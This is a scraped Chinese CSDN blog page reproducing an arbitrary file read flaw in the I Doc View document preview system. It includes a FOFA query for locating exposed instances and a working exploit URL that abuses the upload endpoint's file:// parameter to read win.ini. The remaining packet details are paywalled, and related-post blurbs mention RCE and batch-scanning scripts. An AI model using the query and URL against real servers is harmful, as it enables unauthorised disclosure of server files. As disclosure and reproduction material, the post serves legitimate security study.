I Doc View在线文档预览系统存在任意文件读取漏洞 附poc

最新推荐文章于 2024-02-27 10:03:08 发布
最新推荐文章于 2024-02-27 10:03:08 发布
阅读量496 收藏 9
点赞数 9
分类专栏: 漏洞复现 文章标签: 网络 安全性测试 web安全 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nnn2188185/article/details/135073051
版权

@[toc]

I Doc View在线文档预览系统存在任意文件读取漏洞

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

1. I Doc View在线文档预览系统简介

I Doc View在线文档预览是一款在线文档预览系统,可以实现文档的预览及文档协作编辑功能。

2.漏洞描述

I Doc View在线文档预览采用了前沿的互联网技术,结合了当今客户需要,为个人或第三方应用提供在线文档预览功能,支持在线文档、压缩文件、图纸文件、图片文件、音频播等多种格式的在线预览。该系统存在任意文件读取漏洞。

CVE编号:

CNNVD编号:

CNVD编号:

3.影响版本

I Doc View在线文档预览系统

I Doc View在线文档预览系统存在任意文件读取漏洞

4.fofa查询语句

title=="在线文档预览 - I Doc View"

5.漏洞复现

漏洞链接:http://127.0.0.1/doc/upload?token=testtoken&url=file:///C:/windows/win.ini&name=test.txt

漏洞数据包:

GET /doc/upload?token=testtoken&ur
了解本专栏 订阅专栏 解锁全文 超级会员免费看
sublime88
关注
  • 9
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
【1day】复现I Doc View后台弱口令漏洞
记录并分享学习安全的知识点..
12-02 550
IDocV是一家跨国在线文档预览服务公司,为用户提供文档预览的功能。该公司提供第三方API,使开发者能够将其文档预览服务集成到自己的应用程序中。I Doc View后台存在弱口令,攻击者可以通过弱口令,成功登录后可能获取敏感信息、篡改数据或进行其他恶意活动。
I Doc View在线文档预览系统RCE漏洞复现(QVD-2023-45061)
0xSec
11-23 2261
远程未经身份验证的攻击者可通过构造特殊请求,目标应用将下载恶意文件,成功利用此漏洞可能在目标服务器上执行任意代码。
DocViewer(文档查看器)1.0.7免费绿色版
07-25
DocViewer可以快速查看各种帮助系统格式-iOSHELP、 AndroidHelp、 Xamlhelp、 SilverlightHelp 和 PhoneHelp,软件界面干净简洁,是用户办公的得力助手,需要的朋友快来下载使用吧。
I Doc View在线文档预览任意文件读取
Keepb1ue的博客
12-20 1171
I Doc View在线文档预览是一款在线文档预览系统,可以实现文档预览文档协作编辑功能。其存在任意文件读取漏洞,可通过该漏洞读取服务器各敏感文件
漏洞分析 | iDocView在线文档预览系统远程代码执行漏洞
WangsuSecurity的博客
12-20 869
近期,网宿安全演武实验室监测到iDocView存在远程代码执行漏洞:远程攻击者可以利用该漏洞让目标应用下载恶意文件,最终获取服务器权限。
I DOC VIEW前台RCE分析
2301_80127209的博客
12-18 100
文件操作是十分敏感的操作,尤其是向服务器中下载文件,同时下载的文件最好也有固定的目录存放并防止目录穿越,开发者已经想到了下载文件的风险,但是却没有将对策做好,导致了本次漏洞。接口因为处理不当,导致可以远程读取任意文件,通过这个接口导致服务器下载恶意的JSP进行解析,从而RCE。但是下面做的操作就是本此漏洞的关键了,软件本意应该是想做一个比较完善的爬虫,所以接下会调用。前面的内容不是特别紧要,这里有一个去爬取页面的方法,也是唯一使用了。其实到上面这里还好,都是一些写文件的操作,并且写的也是。
文档预览服务器,特色 - I Doc View在线文档预览
weixin_29608291的博客
08-10 549
使用对象个人和第三方应用均可使用:个人:可以在示例页面上传和预览文档第三方应用:通过我们提供的第三方应用API接口来调用,或者将预览服务部署到您自己的服务器上。预览本地文档您可以上传并在线查看您计算机的文档预览网络文档您可以对网络文档进行预览。阅读进度条doc, docx, ppt, pptx和txt文档大于约3页时,预览页面底部会出现阅读进度条。页面定位doc, docx和txt文档大于约3页...
I Doc View 多个高危漏洞复现
fly夏天的博客
12-18 726
I Doc View 多个漏洞复现
idoc集成-控制预览工具栏按钮
yinmai的专栏
09-12 553
idoc安装略过,参考官方文档。。。 Word - I Doc View在线文档预览文档协作编辑、幻灯片远程控制、同步信息展示等,支持格式:doc, docx, xls, xlsx, ppt, pptx, pdf和txt等。https://api.idocv.com/view/url?url=http%3a%2f%2fapi.idocv.com%2fdata%2fdoc%2finstall.docx&type=html 项目背景是除了使用idoc预览功能,某些场景下还需要对预览对工具栏上根据
【1day】复现I Doc View系统upload接口任意文件读取漏洞
记录并分享学习安全的知识点..
12-11 1427
IDocV是一家跨国在线文档预览服务公司,为用户提供文档预览的功能。该公司提供第三方API,使开发者能够将其文档预览服务集成到自己的应用程序中。I Doc View系统upload接口存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中敏感文件
WordPress Plugin - WPdiscuz 7.0.4 任意文件上传漏洞poc,python脚本,复现所需软件安装
01-01
WordPress Plugin - WPdiscuz 7.0.4 任意文件上传漏洞poc,python脚本,复现所需软件安装包wordpress-5.4.1-zh_CN.tar.gz,phpStudy_64_v8.1.1.3.zip,phpStudy-1_v8.1.0.3.zip,wpdiscuz.7.0.4-1670423032410.zip
蓝海卓越计费管理系统任意文件读取批量检测脚本
06-16
-u 指定单个url -l 指定url文件 先用fofa搜索所有涉及蓝海系统的url,然后直接跑这个脚本就可以
GitLab任意文件读取漏洞(CVE-2020-10977)POC
01-15
检测脚本
齐博CMS V7任意文件下载漏洞
09-07
# 齐博CMS V7任意文件下载漏洞 ## 漏洞影响 ``` 齐博cms V7 ``` ## FOFA ``` app="齐博cms" ``` ## Poc 综合验证和利用脚本见 Qibo_v7.py
Huawei Auth-Http Server 1.0 passwd文件泄露漏洞POC
07-05
-u 指定单个url -l 指定url文件 先用fofa脚本爬取所有Huawei Auth-Http相关资产(fofa脚本下载地址:) python3 fofa-cwillchris.py -k body="umweb/u20.png" 然后用此脚本 ./poc.bin -l url.txt
I Doc View在线文档预览qJvqhFt.json接口存在任意文件读取漏洞 POC软件
最新发布
nnn2188185的博客
02-27 75
I Doc View在线文档预览qJvqhFt.json接口存在任意文件读取漏洞 POC软件
I Doc View在线文档预览系统 cmd.json RCE漏洞复现
0xSec
12-24 1085
I Doc View在线文档预览系统 cmd.json 接口处存在命令执行漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
IOS实现doc、pdf等文档读取
K_Shao的博客
10-15 1418
ios实现tex、doc、pdf等文档读取iCould相关配置AppID配置工程配置代码调用获取选取本地文件路径读取文件 iCould相关配置 AppID配置 打开iCloud 开关,并配置一个iCloud容器。 工程配置 这里有个坑,xcode 必须要登录开发者账号,否则iCloud Document 选项选择会报错。 代码调用 获取选取本地文件路径 //获取UIDocumentPicker...
I Doc View在线文档预览系统cms.json存在RCE漏洞
3tefanie丶zhou的博客
12-15 393
【须知少时凌云志,曾许人间第一流。】
任意文件读取漏洞poc
09-03
任意文件读取漏洞poc的下载地址为GitHub - YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi: Tomcat-Ajp协议文件读取漏洞。这个漏洞是由长亭科技安全研究员发现的存在于Tomcat中的安全漏洞。攻击者通过Tomcat AJP协议的设计缺陷,可以利用Tomcat AJP Connector读取或包含Tomcat上所有webapp目录下的任意文件。这包括了读取webapp配置文件或源代码。如果目标应用有文件上传功能,配合文件包含的利用还可以导致远程代码执行的危害。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [幽灵猫 Tomcat文件读取/任意文件包含漏洞(CVE-2020-1938 / CNVD-2020-10487)](https://blog.csdn.net/m0_62466350/article/details/130568199)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

sublime88

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值